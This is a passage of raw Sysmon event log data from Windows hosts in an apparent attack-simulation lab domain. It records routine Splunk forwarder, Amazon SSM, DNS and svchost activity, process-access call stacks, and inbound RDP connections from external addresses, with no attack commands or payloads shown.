Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53282-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:21.161{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B0BF93414C74245AE718E1F83BC03A,SHA256=2F82112101ABBDEBF66CC994EBC3AABE57C6DB224F3D0B38087D1BD59A637CE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:20.032{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56879- 23542300x80000000000000001049070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:22.176{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AEF5AFBD866227D27F66171F536DD40,SHA256=9BDE7F96199E5B6C70495BB0F3E6340F27FF020E52E03BC756B12390776FC6CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:22.768{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6059427097F554811B950D134BFB1B06,SHA256=26C46DEEE376A0141AD5B7B7541714921A37A90FC10938D6652C693C87145768,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977652Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:22.094{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE683B22D254D27D17900492553137E,SHA256=CE47E446027F4F9BE65E7CADE948809295183B82D68CAFA39B539382990670AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:23.191{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B55EFDC1DFA17454BAA6505561428B7D,SHA256=08EAD8E323FA8EFB2817A0C6E668B20BAEB1884ED604A2A4FCFCFBE0DEBECE8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977655Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:19.775{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-1708-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977654Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:23.096{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15BD19E49D916D88533E78B81789BA66,SHA256=D74FAC43B37B025B786DF25DE84ECC64D2EBCD0734047B7D89A815E1F7782711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:23.062{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4302MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:24.240{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=570E68AA5436B08BEDF87A123B4D50B4,SHA256=76A54778D5DE6EABAE2986B6B0F9A22711D1B93B8EA6B98C1CA5E3F2B50BF3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977659Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:24.346{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7F8D2B47D345DCCE581E7A392346B09,SHA256=705ADA9B313A926700F58F0D9CE970863F2AAC9B5C229C6D3E20AF7D55400ADE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977658Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:21.650{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57946-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977657Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:20.895{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59317-false10.0.1.12-8000- 23542300x8000000000000000977656Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:24.111{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAE2B22AC76BBEBE52798ECED468DBDE,SHA256=A35CD162A47A40A8D4C7A42DB02E2A0F287978FC18F40C2068E4AAEAB7F6D143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:24.077{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4303MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:25.259{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530C6E270D9FDDB297E69C56AAA25C67,SHA256=77FEC44681C226F6623A441B5E7208D84092E8D7A6ED5A0E80942E8C9E9F3345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=785B9D9901C902C28B4FA0085A0D272F,SHA256=E2868D8D958DB8D56DD7816A6C38315D26746318A223B7CE3413C2F0E215CC5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8991-6151-9D79-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8991-6151-9D79-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.955{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8991-6151-9D79-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.925{69CF5F33-8991-6151-9D79-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:21.729{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-13166-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:25.112{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F1DA01ED762A6D02895D98A071A78C1,SHA256=6C703739D323D948113622077F60F479075D01D41116942B145BC6535FB75D8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:25.076{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com51473-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:24.898{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53283-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:26.264{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=848050448DD18B4C13A2F38613A06DAE,SHA256=D494E7AC353CB4471D930649FFBABF20DF6139AE272820E5B3DE26576AF03EBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.861{69CF5F33-8992-6151-9E79-00000000FD01}36922908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8992-6151-9E79-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:26.642{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 